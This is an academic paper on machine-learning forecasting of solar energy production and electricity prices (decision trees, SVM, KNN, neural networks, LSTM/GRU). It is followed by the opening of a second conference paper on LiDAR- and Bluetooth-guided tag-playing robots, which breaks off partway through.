2 Related Work The use of statistical approach based on artificial intelligence methods for forecasting solar power generally uses power measurements and weather predictions of temperature, relative humidity, and solar irradiance at the location of the photovoltaic power system. In order to categorize the local weather type over the next 24 h (as reported by the online meteorological services), a self-organized map (SOM) is trained. The current and the following day data obtained from the output of the forecasting module, are used to calculate the amount of photo voltaic (PV) generation that is currently available. However, the accuracy of this approach is quite low because it can only predict few levels of power output. In order to solve these issues, the author suggests a simpler method for forecasting power generation 24 h in advance utilizing a radial basis function network (RBFN). Results from the suggested approach on a real PV power system demonstrate that it can be used to predict the daily power production of PV power systems with accuracy [1]. To maintain dependable operation and high energy availability, PV technology’s quick growth as well as the expanding quantity and scale of PV power plants necessitate more effective and sophisticated health monitoring systems. Among the many methods, Artificial Neural Network (ANN) has demonstrated the ability to conduct PV fault classification and detection. The advantages of ANN are numerous, including quick decision-making, accurate approximation of nonlinear functions, and no restrictions on the independence or normalcy of input. As a result, ANN has been extensively used in various PV domains, such as solar radiation prediction, maximum power point tracking, solar energy system modelling, PV system size, and performance prediction of solar collector system. In [2] the author has analyzed the applications of ANN for PV Fault Detection and diagnosis. Nearly all typical PV issues, including both electrical faults (reflected in one-dimension characteristics, frequently dealt with by shallow neural networks) and permanent visual abnormalities, have been detected and diagnosed using artificial neural networks (reflected in two-dimension features, commonly dealt with deep neural networks). More than 90% of reported classifications were successful. A few difficulties were found after thorough use case evaluations. The model’s challenging
398
V. H. Subburaj et al.
configuration and the lack of a readily accessible open database of PV system failures are the most frequent ones. The latter is particularly difficult for deep neural networks since it is crucial for understanding how many PV pictures are at fault [2]. A correct understanding of the availability and fluctuation of solar radiation intensity in terms of time and domain is crucial for the proper, economical, and efficient production and exploitation of solar energy. The author in [3] has analyzed the neural networks that are used to forecast global solar radiation (GSR) on horizontal surfaces for Abha, a city in western Saudi Arabia, using the air temperature, day of the year, and relative humidity variables as input. To evaluate the effectiveness of the ANN system, data from 240 days in 2002 were used. The GSR was predicted using solely measured values of temperature and relative humidity. The obtained data demonstrate that neural networks are competent in estimating GSR from temperature and relative humidity [3]. With the growth of photovoltaic energy, a number of tools and strategies have been put out in the literature to take use of AI algorithms for solar energy forecasting. A strategy for forecasting solar energy is presented in [4] and is based on deep learning and machine learning methods. In order to achieve optimal management and security (while applying a comprehensive solution based on a single tool and an acceptable predictive model), the relevance of the few models was assessed for real-time and shortterm solar energy forecasting. The variables used in this analysis include the years 2016 through 2018 and are relevant to Errachidia, a semiarid climatic region in Morocco. The most pertinent meteorological inputs for the models were determined using the Pearson correlation coefficient. The findings led the authors to the conclusion that ANN, which has demonstrated good accuracies and low errors, is a straightforward and reliable model that is able to reduce learning errors and is appropriate for real-time and short-term solar energy predictions technique that appears to be also promising for long-term solar energy forecasting [4]. In order to forecast the solar energy production provided by photovoltaic generators, the research in [5] suggests ANN. There are two primary problems brought by solar power’s sporadic nature. To assure management of the entire system, power output and demand must first be balanced. However, due to clean energy’ inherent unpredictability, this is challenging. Second, the energy producing businesses need a very precise estimate of the energy that will be sold in the power pool, either day-ahead or intraday. The research enables forecasting future power output in order to optimize grid control since the technology can predict the variables that are involved in solar energy production with the aid of MATLAB® software. Due to their internet connectivity, microgrids are able to gather information from weather forecasts issued by meteorological organizations and utilize this information together with a built tool to anticipate the future energy generated by PV producers. Microgrid controllers can therefore balance the outcomes of the ANN. As a result, the advantage from the developed tool is an increase in the effectiveness and dependability of the microgrid control since the backup systems will only be activated when they are actually required [5]. The research study in [6] reviews several solar energy modelling approaches, which are categorized according to the approach’s nature. This review has considered both linear and nonlinear artificial intelligence models for predicting solar energy. According to the review’s findings, the sunlight ratio, air temperature, and relative humidity have
Predictive Analysis of Solar Energy Production
399
the strongest relationships with solar energy. Data on solar radiation show how much of the sun’s energy is incident on a surface at a certain spot on earth at a given time. Alternative methods of producing this data are required due to the expense and complexity of measuring solar radiation, as well as the fact that these data are not easily accessible. According to the review, the most connected coefficients for estimating solar energy are the sunlight ratio, ambient temperature, and relative humidity. Additionally, it is observed that when compared to linear and nonlinear models, ANN models provide the most accurate means of estimating solar energy [6]. Global solar energy forecasts are simple to compute when the weather is clear or sunny. As a result, the research in [7] examines and offers the Artificial Neural Network (ANN) models for global solar energy forecasting for various sky conditions, including clear, hazy, partially cloudy, and totally overcast circumstances. This study also used meteorological characteristics to apply for various climatic situations, such as composite, warm & humid, moderate, hot & dry, and cold & cloudy climate zones. The current study investigates how a model for forecasting short-term photovoltaic output in solar energy systems may be implemented. According to the overall analysis, there has been a noticeable decrease in error when utilizing the Radial-Basis-Function-Neural-Network (RBFNN) model compared to other approaches. The model has been used for a wider variety of applications, and it has been found that for short-term photovoltaic power forecasting in a composite climatic zone, the hazy model performs best with a Mean Absolute Percentage Error (MAPE) of 0.0019%, followed by the sunny, partly cloudy, and fully cloudy models with MAPEs of 0.024%, 0.054%, and 0.109%, respectively [7]. Numerous studies have been conducted on solar energy in an effort to maximize daytime solar radiation, determine the amount of solar power generated, and improve the effectiveness of solar systems. A study of data mining techniques used for solar power prediction in the literature is specifically introduced in this research. Artificial neural networks have been demonstrated to be the most effective way for predicting solar power generation [8]. The cost of operations and maintenance currently has a significant influence on the profitability of managing power modules, thus energy market players must project solar power in the near or far future. In this research [9] the authors suggest a method for forecasting solar power using long-short-term memory networks and convolutional neural networks, which have recently been created for time series data analysis in the deep learning community. The authors empirically confirm that the proposed method accurately predicts the solar power with roughly estimated weather data obtained from national weather centers and that it operates robustly without sophisticated preprocessing to remove outliers. This is important because weather information may not always be available for the location where PV modules are installed and sensors are frequently damaged. In order to employ time series data gathered from photovoltaic inverters and national meteorological centers, a unique deep neural network was created and trained to estimate the amount of solar electricity that will be generated the next day. The results demonstrated that cutting-edge deep neural network-based solar power prediction system works best based on extensive trials using real-world data sets [9]. A feasibility analysis of the PV system in terms of the local environmental characteristics, including the implementation time and cost, is necessary for PV investment. An
400
V. H. Subburaj et al.
artificial neural network was used to simulate the data from the 1.4 PV system that was erected in Sohar, Oman, for the study in [10]. This study’s contribution is the application of three suggested ANN models (MLP, SOFM, and SVM) to forecast comparable systems in twelve other sites around the nation using data on observed sun irradiance and local temperature. According to the sensitivity analysis, solar irradiance has a greater impact on the production than ambient temperature. Additionally, a forecast of Duqm’s PV production was made through 2050, and it was discovered that there has been little to no change from 2020 to 2050 as a result of climate change. Solar irradiance and ambient temperature were used to monitor and record the system output over the course of a complete year. The output of the system is utilized to train three distinct ANN techniques, including MLP, SOFM, and SVM. In comparison to MLP and SVM, it is discovered that the SOFM exhibits more accuracy (95.25%) and fewer RMSE error (0.2514) [10]. In order to keep the demand for electricity from exceeding supply and to provide clean energy to the intelligent power grid, PV power generation is essential. PV energy is expanding and being coupled to the intelligent power grid. As PV generation is intermittent, dependent on weather, and dispersed across the grid, forecasting would be essential to the integration of PV generators into the smart power grid. In [11], a thorough analysis of the PV forecasting techniques’ performances has been conducted. The research examines the relevance of PV generation forecasts in a smart power grid as well as a wide range of associated challenges at both the centralized and distributed levels. Forecasting solar PV output is crucial to the integration of PV systems with smart grids. The scheduling of loads and the trade between power system operators will be improved through forecasting. In this work, a variety of forecasting methods and models have been examined. It has been discovered that the model’s predicting outcome depends on the forecasting horizon, the data at hand, and the method used to make the prediction. Additionally, it has been found that when input and output have a strong correlation, the model’s accuracy will rise. The model’s accuracy improves as more input variables are included in the forecasting process [11]. Accurate and reliable PV power projections are needed to create predictive control algorithms for effective energy management and monitoring residential grid-connected solar systems. An irradiance forecast model and a PV model are used to present a PV yield prediction system. By utilizing the PV model, the irradiance forecast is converted into a forecast of PV power. The suggested irradiance forecast model is built on a number of feed-forward neural networks. Compared to the PV power persistence prediction model, PV power forecasts based on neural network irradiance forecast have done substantially better. In addition to meteorological factors, solar angles (azimuth angle and zenith angle) and extraterrestrial irradiance are potential predictors for the global horizon irradiance (GHI), according to the sensitivity analysis of the multiple feed-forward neural network GHI forecast model. Additionally, it may be inferred that the GHI neural network forecast model responds more quickly to temperature, cloudiness, and sunlight than to other inputs [12]. The authors in [13] have estimated sun irradiance using the Artificial Neural Network through Backpropagation method. The model makes use of pertinent data for training as well as solar irradiance and meteorological data from the preceding seven days. The forecasting outcomes project sun irradiance at half-hour intervals for present conditions,
Predictive Analysis of Solar Energy Production
401
which were not accounted for in the models. The average absolute percentage errors in the forecasting for the four days are less than 6%, according to simulation findings [13]. The effectiveness and lifespan of solar panels would be severely harmed by abnormal shadowing on their surface. This study developed a solar panel abnormal shading detecting system. Find the shade first, then remove the solar panel. Finally, the shading is recognized and classified using the object detection technique. The system’s aberrant shading classification accuracy is 94.5%, according to experimental data, which is 23% greater than the prior approach [14]. In order to integrate intermittent renewable energy sources (RES) into electrical utility networks, it is crucial to anticipate sun irradiance for photovoltaic power generation. Multigene genetic programming (MGGP) and the multilayer perceptron (MLP) artificial neural network are two machine learning (ML) techniques that are being evaluated in this study for the prediction of intraday solar irradiance (ANN). MGGP is a cutting-edge method in the discipline that uses an evolutionary algorithm in a white-box environment. In order to compare these approaches based on a wide range of trustworthy outcomes, Persistence, MGGP, and MLP were compared to forecast irradiance at six sites, within horizons from 15 to 120 min. When extra meteorological variables are included, irradiance forecast ability is improved by 3.41% for root mean square error and 5.68% for mean absolute error (MAE), according to the evaluation of exogenous inputs (RMSE). Additionally, iterative forecasts’ increased accuracy in MGGP was confirmed. The outcomes demonstrate how the definition of the error metric and the location have an impact on model accuracy dominance. The Haurwitz and Ineichen clear sky models were both used, and the findings showed that their impact on the multivariate ML forecasting’s prediction accuracy was minimal. In general, MGGP provided faster solutions for single prediction scenarios and more accurate and reliable outcomes than ANN did for ensemble forecasting, despite the latter’s increased complexity and need for more computing work [15].
3 Research Methodology 3.1 Data Preparation and Preprocessing 3.1.1 The Obstacle of Data Preparation Extracting the data from a file and merging or separating the data throughout the datasets was probably one of the largest obstacles. While the language has convenient, easy to use functions and libraries, and a vast region of information to search through on the internet, learning how to use the functions in combination proved to be challenging at times. 3.1.2 Preprocessing Methods The data was extracted from CSV files using the “pandas” module. Using parameters and other functions, the inputs (Temperature, Wind Speed, Humidity) were merged together into one variable and the output (System Production) was placed into another. Then different wavelet transforms were applied to the inputs and the output was separated
402
V. H. Subburaj et al.
into classes based off of a range of the system production. Since some areas of the data were noisier than others, different intervals of time were experimented with to make the models perform better. The final training and testing was done in the period from 2018-01-01 to 2019-01-01 because it seemed to yield the best results. The Local Marginal Price (LMP) data consisted of the entire year of 2018. The data was split on the date of 2018-11-01. All the data before that date was used in training and the latter portion used in testing. 3.2 Feature Extraction The aim of the data collected in this research effort was to predict energy produced given the information about the temperature, wind speed, and humidity. To improve accuracy of the algorithms, the output was converted from its true value (measured in Wh) to a value that represented a class or range of outputs. In this case, 10 classes with a range of 12000 Wh seemed to work best. A function, that cuts the data into classes automatically, was tried. The function divides classes based on the range of the maximum and minimum values plus ten-percent on each side. However, it seemed to work better to manually set the intervals. Wavelet transforms were also applied to all of the initial data that was collected in this research effort. 3.3 Machine Learning and Neural Network Algorithms Overview 3.3.1 Decision Tree The Decision Tree was one of the first models used. The Decision Tree is a simple nonparametric, supervised learning algorithm that can be used for classification or regression purposes. Made obvious by its name, the algorithm is built on a tree structure and uses an assortment of algorithms to make decisions on when to split a decision node into two or more sub-nodes. 3.3.2 Support Vector Machines (SVM) The SVM is a supervised, deep-learning algorithm for classification or regression. The algorithm separates the data into classes finding lines or hyper-planes that best separate all of the data. 3.3.3 K-Nearest Neighbors (KNN) KNN is a non-parametric, supervised learning algorithm that can be used for regression or classification purposes. This algorithm makes predictions by calculating the distance of “K” sample values from a given point. Whatever the classification is of the majority of the sample values is what that point will be classified as.
Predictive Analysis of Solar Energy Production
403
3.3.4 Sequential Neural Network In general, Neural Networks are not like the other models because they are not a “one size fits all” type of model. The user must set up the model to work for the current set of data and it will, most likely, not carry over or cannot be used on just any other dataset. For this dataset, the following model was built: The input layer had three nodes for the three inputs, five hidden layers that had ten, fifty, one-hundred, twenty-five, and twenty in that order. Those layers feed into the final output layer that had ten nodes for the ten classes with ranges of 12000 Wh. The optimizer used was the Adaptive Moment Estimation (ADAM) optimizer which is an extension to stochastic gradient descent algorithm. The network also used Sparse Categorical Cross Entropy for calculating loss. 3.3.5 Recurrent Neural Networks (RNN) The following RNNs were used for predicting the LMP data from Southwest Power Pool (SPP). 3.3.5.1 Long-Short Term Memory (LSTM) The LSTM model was used for its ability to learn based on order dependence. The structure of the network is actually just like a standard Sequential Neural Network (SNN) but the neuron used is different from that of a normal SNN. An LSTM cell uses an input gate, output gate, and forget gate. The structure of these neurons allows them to remember information over an arbitrary amount of time and makes them well suited for making predictions on Time Series Data. The optimizer used was the Root Means Squared Propagation (RMSP) and the loss was calculated using Mean Squared Error (MSE). 3.3.5.2 Gated-Recurrent Units (GRU) The GRU model is very similar to the LSTM model but is actually faster and uses less memory. However, it uses only two gates instead of the three that LSTM uses. This makes it faster but makes it less accurate. In general, LSTM is preferred for longer sequences while GRU is better for shorter sequences. It seemed that the GRU model had a lower RMSE on the data but it was not as accurate during sharp spikes in the data as the LSTM model was. The optimizer used was Stochastic Gradient Descent (SGD) and loss was calculated using MSE.
4 Analysis of Results Earlier results obtained by the research team [16] had limitations of not using sufficient data for analysis and not being able to introduce new models to do the predictions. These drawback were overcome in this research effort.
404
V. H. Subburaj et al.
Fig. 1. LMP data
Figure 1 shows the Locational Marginal Pricing (in US Dollars per Watt-hour) during the span of January 1, 2018 to January 1, 2019. The section of the graph that is blue is used in the training of the Long-Short Term Memory Neural Network and the orange section was used for testing.
Fig. 2. Temperature data vs Day
In Fig. 2, the X-axis are the dates ranging from January 1, 2018 to January 1, 2021 and the Y-axis shows the Temperature in Fahrenheit for a given date.
Predictive Analysis of Solar Energy Production
405
Fig. 3. Wind speed vs Day
In Fig. 3, X-axis are the dates ranging from January 1, 2018, to January 1, 2021 and the Y-axis shows the Wind Speed in Miles-per-Hour for a given date.
Fig. 4. Humidity vs Day
In Fig. 4, the X-axis are the dates ranging from January 1, 2018 to January 1, 2021 and the Y-axis shows the Humidity in Percent for a given date.
406
V. H. Subburaj et al.
Fig. 5. Energy production vs Day
In Fig. 5, the X-axis are the dates ranging from January 1, 2018 to January 1, 2021 and the Y-axis shows the Site Energy Production in Watt-hours for a given date.
Fig. 6. Decision tree model
Figure 6 shows the results from the Decision Tree Model on the Test Data. Since the data was separated randomly, the X-axis simply shows a randomly selected data value which represents a random time and inputs in the dataset. The Y-axis shows the range in Watt-Hours a given data value falls in. The Red line is what the True value of a point is and the Blue lines shows what it was predicted to be.
Predictive Analysis of Solar Energy Production
407
Fig. 7. SVM model
Figure 7 shows the results from the SVM Model on the Test Data. Since the data was separated randomly, the X-axis simply shows a randomly selected data value which represents a random time and inputs in the dataset. The Y-axis shows the range in WattHours a given data value falls in. The Red line is what the True value of a point is and the Blue lines shows what it was predicted to be.
Fig. 8. KNN model
Figure 8 shows the results from the KNN Model on the Test Data. Since the data was separated randomly, the X-axis simply shows a randomly selected data value which represents a random time and inputs in the dataset. The Y-axis shows the range in WattHours a given data value falls in. The Red line is what the True value of a point is and the Blue lines shows what it was predicted to be.
408
V. H. Subburaj et al.
Fig. 9. Sequential neural network
Figure 9 shows the results from the Sequential Neural Network on the Test Data. Since the data was separated randomly, the X-axis simply shows a randomly selected data value which represents a random time and inputs in the dataset. The Y-axis shows the range in Watt-Hours a given data value falls in. The Red line is what the True value of a point is and the Blue lines shows what it was predicted to be.
Fig. 10. LSTM model
Figure 10 shows the results from the Long-Short Term Memory (LSTM) Model on the Test Data. The Locational Marginal Price (LMP) data was manually split unlike the initial raw real-time data. Therefore, the X-axis actually represents the data values ordered chronologically after November 1, 2018 to January 1, 2019. The Y-axis represents the LMP (in Dollars/Watt-Hour). The Blue lines are the predictions of the LMP while the Red lines are the true values of the LMP.
Predictive Analysis of Solar Energy Production
409
Fig. 11. GRU model
Figure 11 shows the results from the GRU Model on the Test Data. The Locational Marginal Price (LMP) data was manually split unlike the initial raw data. Therefore, the X-axis actually represents the data values ordered chronologically after November 1, 2018 to January 1, 2019. The Y-axis represents the LMP (in Dollars/Watt-Hour). The Blue lines are the predictions of the LMP while the Red lines are the true values of the LMP. 4.1 Wavelet Transforms In an attempt to denoise the data before use in the various models, several wavelet transforms were tried with various wavelets used. In Python, a module called “pywt” exists that allows for the implementation of a wavelet. Similar to a Fourier Transform, the Wavelet Transform is typically used in signal processing to convert time-amplitude information from a signal to time-frequency information. This allows the retrieval of specific frequencies from a signal, or, in the case of this research, from the temperature, wind speed, and humidity data. Using this information, a new signal with less noise can be reconstructed. In this effort, wavelet types were chosen arbitrarily based on graphs that appeared to fit the data the best. Figures 12, 13, 14, 15, 16, 17 and 18 are the graphs of the fit of preferred wavelets: 4.2 Discussion of Results For the Decision Tree Model, it had 29.7% accuracy on the Test Data with an RMSE of 1.60. This means that it was off, on average, of two classes. However, this model was expected not to perform as well. The SVM Model improved slightly. It was able to get 43.2% accuracy with an RMSE of 1.23. The KNN Model was tested with various values for K. It has been observed that values of K that are around the square root of the size of the training data tend to yield better results. This seemed to be true for this dataset and it was found that when K was 32 it had the best accuracy which happened to be 43.2%.This K also produced an RMSE of 0.93. Accuracy was improved to 54.05% on the Sequential Neural Network. However, RMSE came out to 2.61 on the test data.
410
V. H. Subburaj et al.
Fig. 12. Temperature and its denoising using the “rbio2.6” wavelet
Fig. 13. Temperature and its denoising using the “rbio3.7” wavelet.
The accuracy of the above algorithms was off by similar amounts. It can be noted that the average RMSE of the algorithms is about 1.59 and based off Figs. 6, 7, 8 and 9, the predicted values typically trend in the same direction as the actual values but were sometimes off by about one or two classes. A possible reason for these issues could be the need for better preprocessing like getting rid of outliers, trying different
Predictive Analysis of Solar Energy Production
411
Fig. 14. Temperature and its denoising using the “rbio3.9” wavelet
Fig. 15. Wind Speed and its denoising using the “bior5.5” wavelet.
methods of denoising, finding intervals with more consistent trends or a combination of the previously listed. Another way the algorithms could be improved upon is further tweaking of the hyper-parameters like the K value in the KNN model or the kernel type, degree of the kernel polynomial function, or gamma in the SVM model.
412
V. H. Subburaj et al.
Fig. 16. Humidity and its denoising using the “bior5.5” wavelet.
Fig. 17. Humidity and its denoising using the “rbio2.6” wavelet.
The predictive modeling done on the LMP data was slightly different. The model used the actual LMP output instead of placing the values into classes. This made the RMSE larger relative to the first models. Recurrent Neural Networks (RNN) were used on the LMP data because it was time-series data and RNNs learn by order dependence versus the classification style of the other models. Accuracy was not measured on the
Predictive Analysis of Solar Energy Production
413
Fig. 18. Humidity and its denoising using the “rbio2.8” wavelet.
Long-Short Term Memory (LSTM) model. RMSE was 51.77 and the range of the LMP was approximately 2400. The Gated-Recurrent Unit (GRU) model is much like the LSTM model. The two models typically trade off accuracy with speed and memory usage. GRU is typically preferred for shorter sequences and it is quicker and more memory efficient while LSTM is more accurate but slower with more memory usage. However, GRU was able to achieve a slightly better RMSE of 47.55. It seemed that the sharp spikes in the data were not detected as often in the GRU model. Like the models used for predicting the solar output, the neural network models discussed directly above faced some of the same possible issues in the preprocessing stage. The structure of the networks also allows for variation in results. The two networks had the same architecture, but the LSTM nodes were swapped with the GRU nodes. Areas to explore for these models will be looking into different architectures that tend to work for similar datasets. There were research efforts put into finding structures that would better fit the LMP dataset, but it was found that architectures are largely dataset dependent and require experimentation to find the best one. In this paper, the architecture was kept mostly constant, and it was the epochs, the number of times the entire dataset was passed forward and backward through the network, and the batches, the number of data values passed through the network at once, that were adjusted. Due to the large amount of time it took to train, epochs had to be kept relatively small, between 1 and 5 inclusive, while the batch size varied from 10 to 200. These decisions were started out slightly based on research but were mostly arbitrary and were adjusted as the results improved. For the results mentioned above, the epochs were set to five and the batch size was 200 for both models so that they could be compared. Future research will focus on the aspect of the network architecture.
414
V. H. Subburaj et al.
5 Conclusion and Future Work Overall, this research effort analyzed the important of key parameters when it comes to predicting the solar energy production. Real-time data was used in this research and a comparison of the reduction accuracy of the different machine learning models used were discussed in this paper. A single computational framework developed in this research can be made use to making real-time forecasts of solar energy production. This will enable utility companies and enthusiast in the renewable energy sector to take informed decisions when it comes to better administration, utilization, and maintenance of energy sources thereby reducing the underlying challenges. One of the main goals in the future is to enhance future AI algorithms quality through model tuning. This might include applying several methods and time scales, such as averaging results from the same day across several years. When different time intervals are used, a variety of possible combinations of acceptable times are produced. It contains a significant translational element that informs the locals of what to anticipate at that season of the year. Achieving the strong correlation of the temperature, humidity or wind speed can develop a faster discovery and learning mechanisms to the LMP. Improving the research has a huge potential to understand how sustainable and affordable improvements on the focus can be made to be effective and faster to benefit the company and customers.
References 1. Chen, C., Duan, S., Cai, T., Liu, B.: Online 24-h solar power forecasting based on weather type classification using artificial neural network. Solar Energy 85(11), 2856–2870 (2011). ISSN 0038-092X, https://doi.org/10.1016/j.solener.2011.08.027 2. Li, B., Delpha, C., Diallo, D., Migan-Dubois, A.: Application of artificial neural networks to photovoltaic fault detection and diagnosis: a review. Renew. Sustain. Energy Rev. 138, 110512 (2021). ISSN 1364-0321, https://doi.org/10.1016/j.rser.2020.110512 3. Rehman, S., Mohandes, M.: Artificial neural network estimation of global solar radiation using air temperature and relative humidity. Energy Policy 36(2), 571–576 (2008). ISSN 0301-4215, https://doi.org/10.1016/j.enpol.2007.09.033 4. Jebli, I., Belouadha, F.-Z., Kabbaj, M.I., Tilioua, A.: Prediction of solar energy guided by Pearson correlation using machine learning. Energy 224, 120109 (2021). ISSN 0360-5442, https://doi.org/10.1016/j.energy.2021.120109 5. Rodríguez, F., Fleetwood, A., Galarza, A., Fontán, L.: Predicting solar energy generation through artificial neural networks using weather forecasts for microgrid control. Renew. Energy 126, 855–864 (2018). ISSN 0960-1481, https://doi.org/10.1016/j.renene.2018.03.070 6. Khatib, T., Mohamed, A., Sopian, K.: A review of solar energy modeling techniques. Renew. Sustain. Energy Rev. 16(5), 2864–2869 (2012). ISSN 1364-0321, https://doi.org/10.1016/j. rser.2012.01.064 7. Perveen, G., Rizwan, M., Goel, N., Anand, P.: Artificial neural network models for global solar energy and photovoltaic power forecasting over India. Energy Sources Part A: Recovery Utilization Environmental Effects (2020). https://doi.org/10.1080/15567036.2020.1826017 8. Yesilbudak, M., Colak, M., Bayindir, R.: A review of data mining and solar power prediction, pp. 1117–1121 (2016). https://doi.org/10.1109/ICRERA.2016.7884507 9. Lee, W., Kim, K., Park, J., Kim, J., Kim, Y.: Forecasting solar power using long-short term memory and convolutional neural networks. IEEE Access 6, 73068–73080 (2018). https:// doi.org/10.1109/ACCESS.2018.2883330
Predictive Analysis of Solar Energy Production
415
10. Kazem, H.A.: Prediction of grid-connected photovoltaic performance using artificial neural networks and experimental dataset considering environmental variation. Environ. Dev. Sustain. (2022). https://doi.org/10.1007/s10668-022-02174-0 11. Yadav, H.K., Pal, Y., Tripathi, M.M.: Photovoltaic power forecasting methods in smart power grid. In: 2015 Annual IEEE India Conference (INDICON), pp. 1–6 (2015). https://doi.org/ 10.1109/INDICON.2015.7443522 12. Durrani, S.P., Balluff, S., Wurzer, L., Krauter, S.: Photovoltaic yield prediction using an irradiance forecast model based on multiple neural networks. J. Mod. Power Syst. Clean Energy 6(2), 255–267 (2018). https://doi.org/10.1007/s40565-018-0393-5 13. Watetakaran, S., Premrudeepreechacharn, S.: Forecasting of solar irradiance for solar power plants by artificial neural network. In: Proceedings of IEEE Innovative Smart Grid Technologies-Asia (ISGT-Asia), Bangkok, Thailand, 3–6 November 2015, pp. 1–5 (2015) 14. Wang, J., Zhao, B., Yao, X.: PV Abnormal shading detection based on convolutional neural network. In: 2020 Chinese Control and Decision Conference (CCDC), pp. 1580–1583 (2020). https://doi.org/10.1109/CCDC49329.2020.9164630 15. Paiva, G., Pimentel, S.P.: Multiple site intraday solar irradiance forecasting by machine learning algorithms: MGGP and MLP neural networks. Energies 13(11), 3005 (2020). https://doi. org/10.3390/en13113005 16. Penn, D., Subburaj, V.H., Subburaj, A.S., Harral, M.: A predictive tool for grid data analysis using machine learning algorithms. In: 2020 10th Annual Computing and Communication Workshop and Conference (CCWC), pp. 1071–1077. IEEE, January 2020
Implementation of a Tag Playing Robot for Entertainment Mustafa Ayad(B) , Jessica MacKay, and Tyrone Clarke State University of New York, Oswego, NY 13126, USA [email protected]
Abstract. Although robots have been around for a while now, robots continue to charm and attract people. The attraction has led to the increasingly numerous applications of robotics in entertainment, such as in crowd attractions, schools, amusement parks, or individuals’ homes for enjoyment. In this paper, two selfsufficient robots are designed, implemented, and controlled to play a tag game. The two autonomous and identical robots will be set in a bounded space, the playing field. The objective is for one robot, playing the part of “It” to find, identify, and tag the second robot. Then, the tagging process of an object will activate a Bluetooth pairing protocol, through which the “It” robot will confirm the identification of the other robot as a team member. After confirmation, the two robots will switch roles and begin the game again. The authentication process is performed through the Bluetooth protocol, while the LiDAR (Light Detecting And Ranging) sensor decides the direction of the other robots. Finally, the robots were implemented and tested in different scenarios, and they could identify each other on the playing field and switch roles successfully. Keywords: TagBot · LiDAR · Bluetooth
1 Introduction Entertainment is one of the essential applications of autonomous robots. However, the reliability and safety of these types of robots are not as severe as other robots’ applications as industrial robots [1]. Nowadays, technology provides tools for children to add computation components to traditional toy structures and recognize and learn concepts behind different activities [2]. Entertainment robots are used in various applications. For example, they can be interactive communications marketing tools at commerce exhibitions [3]. When the promotional robots move about a commerce exhibitions floor, they actively interact with the attendees and attract them to specific company booths [4]. In this paper, we will focus on one game played by most kids worldwide, the tag game, as in Fig. 1. The game will be designed and implemented using two mini robots with a LiDAR sensor and a Bluetooth module for the handshake process [5]. Playing tag has always been an engaging, fun, and evolving game. It is universally found in playgrounds and parks. However, its reached a point where it has become a highly competitive sport. This sport is called World Chase Tag and is starting to spread worldwide. The idea of © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 416–426, 2023. https://doi.org/10.1007/978-3-031-28073-3_30
Implementation of a Tag Playing Robot for Entertainment
417
focusing on tag-playing robots at a lower scale was brought to our attention. There isn’t much information on this topic, which surprised us and made our thought process very complex. Through creativity and critical thinking, we were able to find a way to establish a method of learning how robots can play tag. The robots, however, need specific tools to enable them to perform the simple tasks of playing tag. Robotics has been used and developed consistently throughout the past years. The purpose of more robots is to limit human error. It usually gives an even more accurate result depending on the task. In this paper, we focus on the use of robotics in entertainment. The idea of constructing robots that will play a form of tag shows how technology has changed its course. These TagBots are a fun and creative way to turn human-like games into a more competitive nature. The robots must perform the following function: • • • •
Move freely in the required space Detect when there is another player in the game Transferable information between the two or more players Avoid obstacles in their way
Fig. 1. Two TagBots on the playing field.
Along with apparent expectations from the implementation of TagBots, we can see that communication plays a significant role in this type of game. Our communication will depend heavily on LiDAR used in robot development. Communication is a common trend encouraged in most robotic designs because it shares the most common trait we use as humans. When it comes to robots, unless programmed to expect specific scenarios, they are blind objects that have no sense of direction or understanding of what’s happening around it. In significant cases like swarm robotics, the ideal purpose is to understand where these robots are coming from. Due to the inapplicability to fully understand how robot-to-robot communication works on an upper scale level, we use an alternative solution. Bluetooth will be embedded in the Raspberry Pi, which will be used as the
418
M. Ayad et al.
essential form of communication that leads to how the implementation of this project will look. This paper aims to introduce a form of entertainment to society. Games you can play all over the globe in different social settings using robots. The problem is that we are solving branches of knowledge on entertainment. Many games are focused on consoles like X box, PC., PS4, and more, but this has the potential to gear people more interest in robotics. The fantastic wonders come from building something of your own and programming it to do multiple tasks simultaneously. Many factors come into making this, but it will allow people to see the bigger gaming picture. The paper is organized as follows: in Sect. 2, we presented some related work. Then, in Sect. 3, the tag robot design and implementation were presented. Then, the hardware components used for the design are presented in Sect. 4. Then, the discussion and results are presented in Sect. 5. Finally, we presented the paper’s conclusion.
2 Related Work There have been several methods to design and program a robot to approach another robot or move toward it. Also, we can program a robot to follow a person or an object. Among these applications is Follow Me technique, where the robot can follow a moving object such as a moving person [5]. In this scenario, the robot follows and observes the target object’s position using various types of sensors, such as laser range finders (LRF) [6], cameras [7], or RGB-D sensors [8]. Afterward, the robot can move toward the target and approaches it while it can avoid obstacles in its way. The choice of the sensors depends upon the application and the complication of the computation power. For example, The advantage of LRF is that object recognition using a 2D LRF requires less computation than a depth image using cameras [9], which is more advantageous for the application where the object moves faster. Moreover, LRF has crucial advantages, it is robust against illumination condition change, and its range [10] is more significant than an RGB-D sensor [11]. Most robots that play with humans do not directly contact other players. However, several works have designed robots that physically get humans or other playing robots [12]. In our design, both robots move slowly, making the touch behavior easier to realize, and we used LiDAR and Bluetooth protocol for tracking and authentication.
3 Design and Implementation Many routes could have gone about achieving this goal, but our most effective starts with the initial circuitry of the robots. For robots to play the form of tag established earlier, they must follow the required steps. Firstly, robots will be linked via (probably) Bluetooth to allow communication between them. Then, each robot will have both the “running” code and the “chasing” (It-bot) code loaded, as well as a method for switching. Robots will be based on the SparkFun Redbot kits, using a Raspberry Pi board and additional components as necessary, as in Fig. 2. Both robots will use LiDAR to detect objects and position themselves in the room. The It-bot will also use it to ascertain the direction of the running robot and will use that to set its course. Finally, the running bot will travel
Implementation of a Tag Playing Robot for Entertainment
419
